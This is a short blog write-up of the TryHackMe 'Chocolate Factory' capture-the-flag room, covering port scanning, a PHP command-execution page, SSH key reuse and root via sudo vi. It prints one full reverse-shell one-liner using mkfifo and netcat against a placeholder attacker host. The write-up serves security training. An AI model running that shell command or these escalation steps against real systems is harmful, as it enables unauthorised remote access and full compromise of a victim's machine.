TryHackMe write-up: Chocolate Factory

3 min readJun 24, 2021



This is my write-up for TryHackMe’s Chocolate Factory Room


Using nmap, I found that this box had several ports open.

Checking the webpage, I found what looked like a login page.

Running nmap’s service enumeration option, I saw something interesting for port 113.

It turns out that a file named key_rev_key is being hosted in the web site. Downloading it using ghidra, I was able to read the code and find the key being asked.

Running dirb, I found a php page.

From my browser, I checked the php page. It looked like it is used to execute commands!


I sent the command “ls -lhtra” to see if this page would run simple commands.

I then tried sending the following command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker IP] [Attacker port] >/tmp/f

I then checked my netcat listener, and found a connection from the target.

Checking the contents of the directory, I found another php file containing a possible set of credentials.

Trying to run su or ssh as this user proved futile. It seems that I needed to escalate privileges another way.

Privilege Escalation

Checking out charlie’s home directory showed what looked like an ssh private key.

Downloading the private key, I was able connect to the target via ssh as charlie.

Checking for sudo privileges, I found that the user charlie can execute vi as root. GTFOBins has a lot of examples showing how to root using vi.

Running and then entering the key found in enumeration phase shows the root flag.




I like breaking stuff.